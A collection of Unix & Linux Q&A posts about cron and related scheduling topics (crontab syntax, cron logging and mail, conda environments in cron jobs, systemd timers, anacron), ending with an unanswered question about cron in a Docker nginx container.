So what happened after running the command grep | crontab? Can anyone explain?
|
crontab installs a new crontab for the invoking user (or the named user, when run as root) by reading it from standard input. That is what happened in your case.
grep without any arguments prints an error message on STDERR as usual and produces nothing on STDOUT; you piped that empty STDOUT into crontab's STDIN, so your crontab was replaced with an empty one and all your jobs were gone.
| Can grep | crontab destroy all jobs? |
1,327,513,801,000 |
I have a script that I want to be able to run in two machines. These two machines get copies of the script from the same git repository. The script needs to run with the right interpreter (e.g. zsh).
Unfortunately, both env and zsh live in different locations in the local and remote machines:
Remote machine
$ which env
/bin/env
$ which zsh
/some/long/path/to/the/right/zsh
Local machine
$ which env
/usr/bin/env
$which zsh
/usr/local/bin/zsh
How can I set up the shebang so that running the script as /path/to/script.sh always uses the Zsh available in PATH?
|
You cannot solve this through the shebang directly, since the shebang is purely static. What you could do is have some »least common multiplier« (from a shell perspective) in the shebang and re-execute your script with the right shell if this LCM isn't zsh. In other words: have your script executed by a shell found on all systems, test for a zsh-only feature, and if the test turns out false, have the script exec with zsh, where the test will succeed and you just continue.
One unique feature in zsh, for example, is the presence of the $ZSH_VERSION variable:
#!/bin/sh -
[ -z "$ZSH_VERSION" ] && exec zsh - "$0" ${1+"$@"}
# zsh-specific stuff following here
echo "$ZSH_VERSION"
In this simple case, the script is first executed by /bin/sh (all post-80s Unix-like systems understand #! and have a /bin/sh, either Bourne or POSIX, but our syntax is compatible with both). If $ZSH_VERSION is not set, the script execs itself through zsh. If $ZSH_VERSION is set (i.e. the script is already running under zsh), the test is simply skipped. Voilà.
This only fails if zsh isn't in the $PATH at all.
Edit: To make sure, you only exec a zsh in the usual places, you could use something like
for sh in /bin/zsh \
/usr/bin/zsh \
/usr/local/bin/zsh; do
[ -x "$sh" ] && exec "$sh" - "$0" ${1+"$@"}
done
This could save you from accidentally exec'ing something in your $PATH which is not the zsh you're expecting.
| Path independent shebangs |
1,327,513,801,000 |
No /var/log/cron, no /var/log/cron.log on my Debian 7. Where is my logfile of crontab?
ls /var/log/cron*
ls: cannot access /var/log/cron*: No such file or directory
|
I think on Debian cron writes its logs to /var/log/syslog.
If your system uses rsyslog or syslogd, you can check for and uncomment the following line in /etc/rsyslog.conf or /etc/syslog.conf:
# cron.* /var/log/cron.log
and then restart the service.
If your system uses systemd, you can check with the following command:
journalctl _COMM=cron
or
journalctl _COMM=cron --since="date" --until="date"
For date format you can check journalctl.
| Where is my logfile of crontab? |
1,327,513,801,000 |
I have set up a backup script to back up world data on my Minecraft server hourly using cron, but because the worlds being constantly edited by players, tar was telling me that files changed while they were read. I added --ignore-command-error to the tar in the script and that suppresses any errors when I run it manually, however cron still sends a mail message saying that files were changed while being read, and ends up flooding my mail because it's run once an hour. Anyone know how to fix this? This is the script:
filename=$(date +%Y-%m-%d)
cd /home/minecraft/Server/
for world in survival survival_nether survival_the_end creative superflat
do
if [ ! -d "/home/minecraft/backups/$world" ]; then
mkdir /home/minecraft/backups/$world
fi
find /home/minecraft/backups/$world -mtime +1 -delete
tar --ignore-command-error -c $world/ | nice -n 10 pigz -9 > /home/minecraft/backups/$world/$filename.tar.gz
done
|
Cron will attempt to send an email with any output that may have occurred when the command was run. From cron's man page:
When executing commands, any output is mailed to the owner of the
crontab (or to the user specified in the MAILTO environment variable
in the crontab, if such exists). Any job output can also be sent to
syslog by using the -s option.
So to disable it for a specific crontab entry just capture all of the commands output and either direct it to a file or to /dev/null.
30 * * * * notBraiamsBackup.sh >/dev/null 2>&1
| Stop cron sending mail for backup script? |
1,327,513,801,000 |
I am using crontab for the first time. Want to write a few very simple test cron tasks, and run them.
$crontab * * * * * echo "Hi"
doesn't produce anything.
crontab */1 * * * * echo "hi"
says */1: No such file or directory.
Also, how do I list the currently running cron tasks (not just the ones I own, but ones started by other users such as root as well).
And how do I delete a particular cron task?
|
You can't use crontab like that. Use man crontab to read about the correct way of calling this utility.
You'll want to use crontab -e to edit the current user's cron entries (you can add/modify/remove lines). Use crontab -l to see the current list of configured tasks.
As for seeing other user's crontabs, that's not possible without being root on default installations. See How do I list all cron jobs for all users for some ways to list everything (as root).
Note: be very careful when you use shell globbing characters on the command line (* and ? especially). * will be expanded to the list of files in the current directory, which can have unexpected effects. If you want to pass * as an argument to something, quote it ('*').
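The pitfall is easy to demonstrate in a scratch directory:

```sh
# Demonstration: an unquoted * is expanded by the shell (sorted file names)
# before the command ever sees it; a quoted '*' stays a literal asterisk.
mkdir -p /tmp/globdemo && cd /tmp/globdemo
touch one two three
echo *      # the shell expands it to the file list: one three two
echo '*'    # quoted: the command receives the literal character *
```

This is exactly why `crontab * * * * * echo "Hi"` fails: the asterisks become file names from the current directory before crontab runs.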
| How do I add an entry to my crontab? |
1,327,513,801,000 |
What's the best way to suppress output (stdout and stderr) unless the program exits with a non-zero code? I'm thinking:
quiet_success()
{
file=$(mktemp)
if ! "$@" > "$file" 2>&1; then
cat "$file"
fi
rm -f "$file"
}
And run quiet_success my_long_noisy_script.sh but I'm not sure if there's a better way. I feel like this has to be something other people have needed to do.
For context, I'm looking to add this to my cron scripts so that I get emailed with everything if they fail, but not if they don't.
|
You're going to have to buffer the output somewhere no matter what, since you need to wait for the exit code to know what to do. Something like this is probably easiest:
$ output=$(my_long_noisy_script.sh 2>&1) || echo "$output"
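If you prefer to keep the function form from the question but without a temp file, a sketch that also preserves the command's exit status and the output's newlines (the quoting is what preserves them) could look like this:

```sh
# quiet_success sketch: swallow all output unless the command fails,
# then replay the captured output and propagate the exit status.
quiet_success() {
    out=$("$@" 2>&1)               # capture stdout and stderr together
    status=$?
    if [ "$status" -ne 0 ]; then
        printf '%s\n' "$out"       # quoted: interior newlines survive
    fi
    return "$status"
}
```

One caveat: stdout and stderr are interleaved in a single capture, so their relative ordering in the replay may differ slightly from a terminal run.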
| Suppress output unless non-zero exit code |
1,327,513,801,000 |
I have a server that it is normally switched off for security reasons. When I want to work on it I switch it on, execute my tasks, and shut it down again. My tasks usually take no more than 15 minutes. I would like to implement a mechanism to shut it down automatically after 60 minutes.
I've researched how to do this with cron, but I don't think it's the proper way because cron doesn't take into account when the server was last turned on. I can only set periodic patterns, but they don't take that data into account.
How could I do this implementation?
|
If you execute your tasks as the same user every time, you can simply add the shutdown command to your profile, optionally with the -P option (power off). The number after + is the number of minutes the shutdown is delayed.
Make sure your user has the ability to execute the shutdown command via sudo without a password.
echo "sudo shutdown -P +60" >> ~/.profile
Added:
After reading most of the other answers I love the option to add "@reboot /<path to script/command>" in (root) cron. Answer given by sebasth as his fourth option. You may either add the shutdown command or write a small script that executes the shutdown and execute that via cron.
WoJ also has a great solution if you use systemd.
| How do I shut down a Linux server after running for 60 minutes? |
1,327,513,801,000 |
How can I only receive emails from cron if there are errors?
In the overwhelmingly vast majority of cases, the tasks will run just fine - and I truly do not care about the output.
It is only in the rare case of a failure that I want/need to know.
I have procmail available - but am not sure if what I'm describing is possible to manage externally to cron "correctly".
|
As you do not care about the output, you can redirect the STDOUT of a job to /dev/null and let STDERR be sent via mail (using the MAILTO environment variable).
So, for example:
...
...
MAILTO=user@example.com
...
...
* * * * * /my/script.sh >/dev/null
will send mail when there is output only on STDERR (with the STDERR), and will discard the STDOUT.
This of course assumes that when a program has written to STDERR, it has failed; this might not always be the case. If you have control over the program, you can make it behave that way. For any complex case, you should write a wrapper of some kind that runs the command(s) and sends mail accordingly. And put the wrapper in as the cron job.
| Disable cron emails unless there are errors? |
1,327,513,801,000 |
This is a Red Hat Enterprise Linux 5 system (RHEL). We manage this system using CFengine.
We have several cronjobs which are running twice as often as usual. I checked the cronjobs under /etc/cron.d/ and this directory contains the actual script called host-backup, and also contains a cfengine backup file called host-backup.cfsaved, as so:
/etc/cron.d/host-backup
/etc/cron.d/host-backup.cfsaved
Does this operating system execute all files at /etc/cron.d/*, or does it only execute files which match a certain pattern. Can I configure this, and where is this defined?
I cannot find this answer in the RHEL or CentOS documentation.
|
(If you're paying for Red Hat support, you should ask them this kind of questions. This is exactly what you're paying for!)
From the RHEL5 crontab(5) man page:
If it exists, the /etc/cron.d/ directory is parsed like the cron spool directory, except that the files in it are not user-specific and are therefore read with /etc/crontab syntax (the user is specified explicitly in the 6th column).
(Is there a simpler way of reading RHEL man pages without having access to it? At least this way I could see that this paragraph is part of the Red Hat patch, so it's not a standard Vixie Cron 4.1 feature.)
Looking at the source, I see that the following files are skipped: .*, #*, *~, *.rpmnew, *.rpmorig, *.rpmsave. So yes, your *.cfsaved files are read in addition to the originals.
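You can also apply those same skip patterns to a directory yourself to see which files cron would parse (a sketch; the directory is a parameter so it can be tried on a scratch copy):

```sh
# Sketch: classify files in a cron.d-style directory using the skip
# patterns from the source quoted above.
list_cron_d() {   # usage: list_cron_d DIRECTORY
    for f in "$1"/*; do
        [ -e "$f" ] || continue
        case ${f##*/} in
            .*|\#*|*~|*.rpmnew|*.rpmorig|*.rpmsave)
                echo "skipped: ${f##*/}" ;;
            *)
                echo "parsed:  ${f##*/}" ;;
        esac
    done
}
```

Running `list_cron_d /etc/cron.d` would show that a `.cfsaved` file matches none of the skip patterns, so cron parses it alongside the original.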
| Does RHEL/CentOS execute all cronjob files under /etc/cron.d/*, or just some of them? |
1,327,513,801,000 |
I have a deployment script.
It must add something to a user crontab
(trigger a script that cleans logs every XXX days);
however, this must be done only during the first deployment,
or when it needs to be updated.
(I can run xxx.py deploy env or xxx.py update env.)
so I need to do this:
Check if my cronJob already exists
Submit my cronJob if it does not already exist
or
update my cronJob if one of the parameter(s) of the command is different
I don't see how to add/check/remove something to the crontab
without using crontab -e or "manually" editing the crontab file
(download it, rewrite it, re-upload it).
PS: this is a user specific cronjob;
"webadmin" is going to do it and he should not use sudo to do it.
|
My best idea so far
To check first if the content matches what should be in there and only update if it doesn't:
if ! crontab -l | egrep -v "^(#|$)" | grep -q 'some_command'
then
    ( crontab -l ; echo '* 1 * * * some_command' ) | crontab -
fi
but this gets complicated enough to build a separate script around that cron task.
Other ideas
You could send the string via stdin to crontab (beware, this clears out any previous crontab entries):
echo "* 1 * * * some_command" | crontab -
This should even work right through ssh:
echo "* 1 * * * some_command" | ssh user@host "crontab -"
if you want to append to the file you could use this:
# on the machine itself
echo "$(echo '* 1 * * * some_command' ; crontab -l 2>&1)" | crontab -
# via ssh
echo "$(echo '* 1 * * * some_command' ; ssh user@host crontab -l 2>&1)" | ssh user@host "crontab -"
| Add something to crontab programmatically (over ssh) |
1,327,513,801,000 |
I'm not quite sure what the standard is for spelling cron. Does one capitalize the whole word? Just the "C"? All lowercase? Is there even a standard, or do you just spell it in whatever way looks or suits best?
Some people say it's an acronym for "Command Run ON unix", others suggest it's derived from "chronos", the Greek word for "time", so I'm not sure.
|
The convention used in the Unix manuals, such as the cron man page from V7, is to capitalize the first letter of utility names when used at the beginning of a sentence, and to use their normal (almost always all-lowercase) spelling within sentences or when they're used in examples.
This convention is used even when the utility name is an acronym, such as dc - desk calculator.
User @Nobody pointed out in the comments that Debian's man pages always use the all-lowercase spelling, including at the beginning of a sentence. This appears to be an editorial decision; looking at the patch file in the Debian source for cron, patches are made to the original Vixie Cron man page, to change .I Cron to .I cron. This is also the case on Debian derivatives such as Ubuntu.
| Correct capitalization of "cron" |
1,327,513,801,000 |
Where does standard output from at and cron tasks go, given there
is no screen to display to?
It's not appearing in the directory the jobs were started from, nor in
my home directory.
How could I actually figure this out given that I don't know how to
debug or trace a background job?
|
From the cron man page:
When executing commands, any output is mailed to the owner of the
crontab (or to the user named in the MAILTO environment variable in
the crontab, if such exists). The children copies of cron running
these processes have their name coerced to uppercase, as will be seen
in the syslog and ps output.
So you should check your/root's mail, or the syslog (eg. /var/log/syslog).
| Where does the output of `at` and `cron` jobs go? |
1,327,513,801,000 |
A few years ago I setup a cron job to automatically ping a URL every minute as part of a monitoring system (that's oversimplification, but it'll do for this question). Because I'm a horrible person, I didn't document this anywhere.
Today, years later, I started having trouble with the application on the other end of the URL that's being pinged. I fixed it, but then realized, I have no idea where this cron job is coming from.
Is there a way to quickly search through or cat out all the crontabs on a particular system? I have root access so permissions aren't a problem. I've only ever been a user of cron, I've never looked too deeply at its implementation, but my *nix instincts say there has to be a group of text files somewhere that hold all the crontabs. I just don't know where they'd be, and if I dug into it I'd be afraid of finding some, but not all of them, or missing some weird nuance of the system
Also, I realize with root access I could
Get a list of all the users in the system
su as a user
crontab -l
Repeat with all the users
but I'm looking for something a little less manual (and looking to learn something about cron's implementation)
|
There are only a few places crontabs can hide:
/etc/crontab
/etc/cron.d/*
/etc/cron.{hourly,daily,weekly,monthly}/*
these are called from /etc/crontab, so consider them an extension of that entry
/var/spool/cron/* (sometimes /var/spool/cron/crontabs/*)
Be sure to check at as well, which keeps its jobs in /var/spool/at/ or /var/spool/cron/at*/
Also, instead of
su <user>
crontab -l
Just do this:
crontab -lu <user>
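If you'd rather grep everything in one go, a small helper along these lines works (the default paths are typical Linux locations and may differ on your system; both arguments are parameters so it can be pointed anywhere):

```sh
# Sketch: search all the usual crontab hiding places for a pattern.
hunt_cron() {   # usage: hunt_cron PATTERN [PATH ...]
    pattern=$1; shift
    # fall back to the standard locations if no paths were given
    [ $# -gt 0 ] || set -- /var/spool/cron /etc/crontab /etc/cron.d \
        /etc/cron.hourly /etc/cron.daily /etc/cron.weekly /etc/cron.monthly
    grep -RHn -- "$pattern" "$@" 2>/dev/null
}
```

For the fugitive ping job, `hunt_cron ping` (as root) prints every matching line with its file and line number.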
| How to Find a Fugitive Crontab |
1,327,513,801,000 |
I have a Anaconda Python Virtual Environment set up and if I run my project while that virutal environment is activated everything runs great.
But I have a cronjob configured to run it every hour. I piped the output to a log because it wasn't running correctly.
crontab -e:
10 * * * * bash /work/sql_server_etl/src/python/run_parallel_workflow.sh >> /home/etlservice/cronlog.log 2>&1
I get this error in the cronlog.log:
Traceback (most recent call last):
File "__parallel_workflow.py", line 10, in <module>
import yaml
ImportError: No module named yaml
That indicates the cronjob is somehow running the file without the virtual environment activated.
To remedy this I added a line to the /home/user/.bash_profile file:
conda activate ~/anaconda3/envs/sql_server_etl/
Now when I login the environment is activated automatically.
However, the problem persists.
I tried one more thing. I changed the cronjob, (and I also tried this in the bash file the cronjob runs) to explicitly manually activate the environment each time it runs, but to no avail:
10 * * * * conda activate ~/anaconda3/envs/sql_server_etl/ && bash /work/sql_server_etl/src/python/run_parallel_workflow.sh >> /home/etlservice/cronlog.log 2>&1
Of course, nothing I've tried has fixed it. I really know nothing about linux so maybe there's something obvious I need to change.
So, is there anyway to specify that the cronjob should run under a virutal environment?
|
Posted a working solution (on Ubuntu 18.04) with detailed reasoning on SO.
The short form is:
1. Copy snippet appended by Anaconda in ~/.bashrc (at the end of the file) to a separate file ~/.bashrc_conda
As of Anaconda 2020.02 installation, the snippet reads as follows:
# >>> conda initialize >>>
# !! Contents within this block are managed by 'conda init' !!
__conda_setup="$('/home/USERNAME/anaconda3/bin/conda' 'shell.bash' 'hook' 2> /dev/null)"
if [ $? -eq 0 ]; then
eval "$__conda_setup"
else
if [ -f "/home/USERNAME/anaconda3/etc/profile.d/conda.sh" ]; then
. "/home/USERNAME/anaconda3/etc/profile.d/conda.sh"
else
export PATH="/home/USERNAME/anaconda3/bin:$PATH"
fi
fi
unset __conda_setup
# <<< conda initialize <<<
Make sure that:
The path /home/USERNAME/anaconda3/ is correct.
The user running the cronjob has read permissions for ~/.bashrc_conda (and no other user can write to this file).
2. In crontab -e add lines to run cronjobs on bash and to source ~/.bashrc_conda
Run crontab -e and insert the following before the cronjob:
SHELL=/bin/bash
BASH_ENV=~/.bashrc_conda
3. In crontab -e include at beginning of the cronjob conda activate my_env; as in example
Example of an entry for a script that would execute at 12:30 each day on the Python interpreter within the conda environment:
30 12 * * * conda activate my_env; python /path/to/script.py; conda deactivate
And that's it.
You may want to check from time to time that the snippet in ~/.bashrc_conda is up to date in case conda updates its snippet in ~/.bashrc.
| cron job to run under conda virtual environment |
1,327,513,801,000 |
My current crontab looks like this:
00 00 * * 1-5 "/home/user/script.sh"
But it seems like it is not being triggered. All others are triggering fine except the one running at midnight.
What is the proper format for midnight? 00 00 or 00 24?
|
I believe 0 0 is the correct specification for midnight (no leading zeros, so in this case no double zero). From man crontab(5):
field allowed values
----- --------------
minute 0-59
hour 0-23
day of month 1-31
month 1-12 (or names, see below)
day of week 0-7 (0 or 7 is Sun, or use names)
If this is in the system crontab (i.e. /etc/crontab), make sure the field between the time specifications and the command is the user that the command is to be executed as.
Also make sure that the path to your command is fully specified, in the $PATH, or makes sense relative to $HOME.
| cron midnight 00 24 or 00 00? [closed] |
1,327,513,801,000 |
Somehow, I am finding it difficult to understand tweaking around * parameters with cron.
I wanted a job to run every hour and I used the below setting:
* */1 * * *
But it does not seem to do the job. Could someone please explain the meaning of above and what is needed for the job?
|
* means every.
*/n means every nth. (So */1 means every 1.)
If you want to run it only once each hour, you have to set the first item to something else than *, for example 20 * * * * to run it every hour at minute 20.
Or if you have permission to write in /etc/cron.hourly/ (or whatever it is on your system), then you could place a script there.
| Meaning of "* */1 * * *" cron entry? |
1,327,513,801,000 |
I need to start a cronjob every day, but an hour later each day. What I have so far works for the most part, except for 1 day of the year:
0 0 * * * sleep $((3600 * (10#$(date +\%j) \% 24))) && /usr/local/bin/myprog
When the day of year is 365 the job will start at 5:00, but the next day (not counting a leap year) will have a day of year as 1, so the job will start at 1:00. How can I get rid of this corner case?
|
My preferred solution would be to start the job every hour but have the script itself check whether it's time to run or not and exit without doing anything 24 times out of 25.
crontab:
0 * * * * /usr/local/bin/myprog
at the top of myprog:
[ 0 -eq $(( $(date +%s) / 3600 % 25 )) ] || exit 0
If you don't want to make any changes to the script itself, you can also put the "time to run" check in the crontab entry but it makes for a long unsightly line:
0 * * * * [ 0 -eq $(( $(date +\%s) / 3600 \% 25 )) ] && /usr/local/bin/myprog
| How can I start a cronjob 1 hour later each day? |
1,327,513,801,000 |
I want to know whether there is any easier way to run a job every 25 minutes. In cronjob, if you specify the minute parameter as */25, it'll run only on 25th and 50th minute of every hour
|
The command in crontab is executed with /bin/sh so you can use arithmetic expansion to calculate whether the current minute modulo 25 equals zero:
*/5 * * * * [ $(( $(date +\%s) / 60 \% 25 )) -eq 0 ] && your_command
cron will run this entire entry every 5 minutes, but only if the current minute (in minutes since the epoch) modulo 25 equals zero will it run your_command.
As others have pointed out, 1 day is not evenly divisible by 25 minutes, so this will not cause your_command to run at the same time every day, but it will run every 25 minutes.
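You can sanity-check the arithmetic without involving cron at all: minutes-since-epoch modulo 25 returns to zero exactly once every 25 minutes, regardless of hour or day boundaries.

```sh
# Sanity check of the modulo trick used in the crontab entry above.
base=$(( $(date +%s) / 60 ))     # current minute number since the epoch
base=$(( base - base % 25 ))     # align to a 25-minute boundary
for offset in 0 5 10 15 20 25; do
    # the guard in the crontab entry fires only when this prints 0
    echo "+${offset}min -> $(( (base + offset) % 25 ))"
done
```

Of the six 5-minute wake-ups shown, only the first and the last land on a 25-minute boundary, which is exactly the once-in-five behaviour the cron entry relies on.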
| CronJob every 25 minutes |
1,327,513,801,000 |
Ubuntu 14.04
I don't understand the behaviour I'm seeing with setting up crontab for a service (no login) account (named curator).
When I'm logged in as root, this is what I get:
# crontab -u curator -l
The user curator cannot use this program (crontab)
But, when I switch to the user's account, it works fine:
# su -s /bin/bash curator
curator@host$ crontab -l
no crontab for curator
There is an empty /etc/cron.allow file and no /etc/cron.deny file on the system. According to man crontab:
If the /etc/cron.allow file exists, then you must be listed (one user per line) therein in order to be allowed to use this command. If the /etc/cron.allow file does not exist but the /etc/cron.deny file does exist, then you must not be listed in the /etc/cron.deny file in order to use this command.
I understand the error when I'm running the first command, but why does it allow me to run crontab when I explicitly switch to the user's account?
Adding the user to /etc/cron.allow makes both commands work fine.
|
I checked the crontab sources and found that if the user cannot open /etc/cron.allow (for instance after chmod 0 /etc/cron.allow), crontab thinks the user is allowed to use it (as if cron.allow did not exist).
But root can read any file, so crontab checking code works as expected. So I recommend you to check first permissions on /etc/cron.allow, and maybe SELinux/AppArmor audit logs.
| The user x cannot use this program (crontab) |
1,327,513,801,000 |
I need to write a timer unit for a machine which is turned off frequently (e.g. classical desktop setup). This timer unit needs to be activated regularly, but not very often (e.g. weekly, monthly).
I did find some approaches, but they all don't really fit:
According to the man pages, only the OnBootSec and the OnStartupSec directives will be activated if the configured point of time is in the past. I found as well some examples using a combination of these with OnActiveSec to define a regular event. The problem is: Every time the machine is booted the timer will activate the configured unit. If you got a timer which should run ONCE a week/month that is far too often. For example: I don't want to get my logs rotated three times a day!
Solutions with the OnCalendar directive. If the machine is powered off at the configured point in time (mostly midnight because if you omit the hour in the time specification it defaults to 00:00:00) the timer won't be activated after the next boot. That's at least how I got it. Is that right?
Are timer with calendar events activated right after the next startup if the configured time is in the past? If not, is there a workaround to get such a behaviour?
|
This feature has already been implemented in systemd (ver >= 212) using the Persistent= directive so you just need to insert Persistent=true in the unit file while using OnCalendar= directive to establish the date/time to run the job.
Persistent=
Takes a boolean argument. If true, the time when the service unit was last triggered is stored on disk. When the timer is activated, the service unit is triggered immediately if it would have been triggered at least once during the time when the timer was inactive. This is useful to catch up on missed runs of the service when the machine was off. Note that this setting only has an effect on timers configured with OnCalendar=.
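Putting it together, a matching timer unit might look like this (unit names are placeholders; a weekly-job.service containing the actual work is assumed to exist):

```ini
# /etc/systemd/system/weekly-job.timer -- hypothetical example
[Unit]
Description=Run weekly-job once a week, catching up after downtime

[Timer]
OnCalendar=weekly
Persistent=true

[Install]
WantedBy=timers.target
```

Enable it with systemctl enable --now weekly-job.timer; systemctl list-timers then shows the last and next trigger times, including catch-up runs after a period when the machine was off.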
| systemd - Timer units that mimic anacron behaviour |
1,327,513,801,000 |
I have the following cron jobs defined.
55 8 * * 3 /usr/bin/php /home/mark/dev/processes/customClient/events.php > /home/mark/dev/processes/customClient/events-`date +%Y-%m-%d --date='last Wednesday'`-`date +%Y-%m-%d`.csv
0 9 * * 3 /usr/bin/echo 'The csv for last week, trying my hand at automatiging this' | /usr/bin/mutt <emailaddress> -s 'Events from `date +%Y-%m-%d --date='last Wednesday'`-`date +%Y-%m-%d`' -a '/home/mark/dev/processes/customClient/events-`date +%Y-%m-%d --date='last Wednesday'`-`date +%Y-%m-%d`.csv'
It seems to work properly if I run it the above command directly from the command line. But when I checked the running of the script this morning I got an e-mail stating (I'm paraphrasing because I accidentally deleted them) that the back ticks weren't closed properly.
|
I strongly recommend putting any non-trivial cron jobs into their own shell script file, for many reasons:
Easier to debug: you can just run the script instead of copy pasting a long line, and with the right shebang line, it behaves much more predictably than if you had the same commands directly in the crontab
Easier to read: no need to make it a 200+ character one-liner, you can format it nicely so it's easy to read and understand for everyone
Add the script to version control
| What's wrong with these two cron jobs? [duplicate] |
1,327,513,801,000 |
I ssh to a server, and want to add some daily jobs (specifically to renew Kerberos tickets, so that even after I log out my programs in screen or tmux continue to run) to cron. So I run crontab -e, and add the following,
00 00 * * * kinit -R
00 12 * * * kinit -R
When I save it, I am asked by the editor:
File Name to Write: /tmp/crontab.HMpG7V
Isn't it that the files in /tmp can be deleted by the OS? Especially after I log out of the server?
Where shall I store my crontab file? Can I save the crontab file under $HOME or some better space?
|
crontab -e opens a file in /tmp instead of the actual crontab so that it can check your new crontab for errors and prevent you from overwriting your actual crontab with those errors. If there are no errors, then your actual crontab will be updated. If crontab -e just wrote straight to your actual crontab, then you would risk all of your cronjobs failing to run due to a syntax error in your new crontab.
sudoedit, visudo, vipw, etc. operate on the same principle.
Don't worry, your actual crontab lives in a non-volatile location on disk.
| Shall I save my crontab file in /tmp? |
1,327,513,801,000 |
I was reading about the differences between cron and anacron and I realized that anacron, unlike cron is not a daemon. So I'm wondering how does it work actually if it's not a daemon.
|
It uses a variety of methods to run:
if the system is running systemd, it uses a systemd timer (in the Debian package, you’ll see it in /lib/systemd/system/anacron.timer);
if the system isn’t running systemd, it uses a system cron job (in /etc/cron.d/anacron);
in all cases it runs daily, weekly and monthly cron jobs (in /etc/cron.{daily,weekly,monthly}/0anacron);
it also runs at boot (from /etc/init.d/anacron or its systemd unit).
| How does anacron work if it's not a daemon? |
1,327,513,801,000 |
I'd like to run a nightly cron job that deletes all the files in a folder that haven't been accessed in a week or more. What is the most efficient way to do this in bash?
|
You want the find tool.
find folder -depth -type f -atime +7 -delete
(This will delete all files (only regular ones, no pipes, special devices, directories, symbolic links) in the given folder and all subdirectories (recursively) where the last access time is longer than 7 days ago.)
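If you are nervous about handing `-delete` to a nightly job, you can dry-run the same expression first with `-print`. A small self-contained demonstration (the directory and filenames are made up for illustration):

```shell
# Dry run in a throwaway directory: -print lists what -delete would remove
dir=$(mktemp -d)
touch "$dir/fresh"
touch -a -d '10 days ago' "$dir/stale"   # backdate the access time

find "$dir" -depth -type f -atime +7 -print   # lists only .../stale

rm -rf "$dir"
```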
| How can I delete all files in a folder that haven't been accessed in a certain amount of time? |
1,327,513,801,000 |
I got a daily crontab task:
50 1 * * * sh /my_path/daily_task.sh > /tmp/zen_log 2>&1
This daily_task shell script will run some python scripts and produce a data file.
It failed for two nights. But when I came in the morning and ran the python scripts manually, I got the data file. I also set a new crontab entry which only changed the schedule to 0 10 * * *, and that one succeeded, too.
So yesterday, I put > /tmp/zen_log 2>&1 in the cron task to get some error message.
And this morning, I got this error message in zen_log:
/my_path/daily_task.sh: line 19: 12364 Killed /usr/local/bin/python2.7 my_python_script.py 2 mix > mix_hc_$datestamp 2>&1
It seems some process has been killed? But what exactly does this line 19: 12364 Killed mean?
PS:
Today, a minute ago, when I manually ran the python script, I got:
/usr/local/bin/python2.7 my_python_script.py 2 mix > mix_hc_$datestamp 2>&1
Killed
|
When applications are being killed unexpectedly, it is a good idea to take a quick look at your /var/log/messages file to see if the kernel is killing the process. The most common trigger (in my experience) has been out-of-memory (OOM) errors; since my company primarily uses Java applications, it is quite common for the devs to publish a bad code update that triggers an OOM event.
Scheduling tasks for when your OS has the most available resources is probably why the job succeeds in some time slots and not in others, where people like to schedule taxing system jobs. Simple solutions are to increase your system's resources, restrict the resources allocated to your code, or move your jobs around so they don't conflict.
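To check whether the OOM killer was responsible, you can search the kernel ring buffer and the syslog. This is a sketch; the log path and the exact message wording vary by distribution:

```shell
logfile=/var/log/messages   # Debian/Ubuntu typically use /var/log/syslog
pattern='out of memory|oom-killer|killed process'

# Kernel OOM kills end up in the ring buffer and usually in syslog too
{ dmesg; cat "$logfile"; } 2>/dev/null | grep -iE "$pattern" \
    || echo "no OOM events found"
```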
| What does `line 19: 12364 Killed` mean in crontab error message? |
1,327,513,801,000 |
I'm running CentOS 5.5.
We have several cronjobs stored in /etc/cron.daily/ . We would like the email for some of these cronjobs to go to a particular email address, while the rest of the emails in /etc/cron.daily/ should go to the default email address (root@localhost).
Cronjobs in /etc/cron.daily/ are run from the /etc/crontab file. /etc/crontab specifies a 'MAILTO' field. Can I override this by setting MAILTO in my /etc/cron.daily/foo cronjob?
What's the best way to handle this?
|
Setting [email protected] in /etc/cron.daily/foo does not work. The script output is not sent to [email protected] .
The page at http://www.unixgeeks.org/security/newbie/unix/cron-1.html also suggests a simple solution:
The file /etc/cron.daily/foo now contains the following:
#!/bin/sh
/usr/bin/script 2>&1 | mailx -s "$0" [email protected]
This will send an email to '[email protected]' with the subject which is equal to the full path of the script (e.g. /etc/cron.daily/foo).
Here's what Unixgeeks.org says about this:
Output from cron
As I've said before, the output from
cron gets mailed to the owner of the
process, or the person specified in
the MAILTO variable, but what if you
don't want that? If you want to mail
the output to someone else, you can
just pipe the output to the command
mail. e.g.
cmd | mail -s "Subject of mail" user
Sometimes, I only want to receive the errors from a cronjob, not the stdout, so I use this trick. The syntax may look wrong at first glance, but rest assured it works. The following cronjob will send STDOUT to /dev/null, and will then handle STDERR via the pipeline.
doit 2>&1 >/dev/null | mailx -s "$0" [email protected]
Same thing, but send to syslog:
doit 2>&1 >/dev/null | /usr/bin/logger -t $ME
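The reason the "wrong-looking" order works is that redirections are processed left to right: 2>&1 first points stderr at wherever stdout currently goes (the pipe), and only then does >/dev/null repoint stdout. A self-contained demonstration:

```shell
# Only "err" travels down the pipe; "out" is discarded
{ echo out; echo err >&2; } 2>&1 >/dev/null | cat
# prints: err
```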
Also see my answer on ServerFault to Cronjob stderr to file and email
| /etc/cron.daily/foo : Send email to a particular user instead of root? |
1,327,513,801,000 |
As a non-root user, I want to run a background job when the system boots. It's sort of a service which doesn't require root privilege. Is there a way to do it?
One way is to put sudo -u user command in rc.local, but editing rc.local requires root privilege.
Another way is to launch it from cron every minute and check for any running instance, but firstly it wakes up the system unnecessarily, and secondly there can be a race condition when checking for running instances.
A third way is to run it in ~/.bash_profile, but I want to start it without user login.
|
You can use cron if your version has the @reboot feature. From man
5 crontab:
Instead of the first five fields, one of eight special strings may appear:
string meaning
------ -------
@reboot Run once, at startup.
…
You can edit a user-local crontab with the command crontab -e without root privileges. Then add the
following line:
@reboot /usr/local/bin/some-command
Now your command will be run once at boot time.
| How to autostart a background program by a non-root user? |
1,327,513,801,000 |
I am using nginx in docker. I have configured cron jobs to update SSL certificates and DNS registration. However the cron jobs are not running.
What have I done. I have created a Dockerfile based on arm32v7/nginx, which in turn is based on debian:stretch-slim. At first I installed cron and assumed that it would run, but then discovered that the service was not started (there is no init subsystem installed; debian:stretch-slim is very minimal). So I added code to start cron. Now if I ask the container if cron is running, it says yes.
#ctrl-alt-delor@raspberrypi:~/a_website/docker$
#↳ docker exec -it $(docker container ls | sed -nr -e 's/.*(website-stack.*)/\1/p') service cron status
[ ok ] cron is running.
However I am not seeing any logs from the task that I have added to cron.
If I run run-parts --report /etc/cron.daily, my tasks get run and produce log output. Therefore it still appears as if cron is not running my jobs.
#ctrl-alt-delor@raspberrypi:~/a_website/docker$
#↳ docker exec -it $(docker container ls | sed -nr -e 's/.*(website-stack.*)/\1/p') cat /proc/12/cmdline; echo
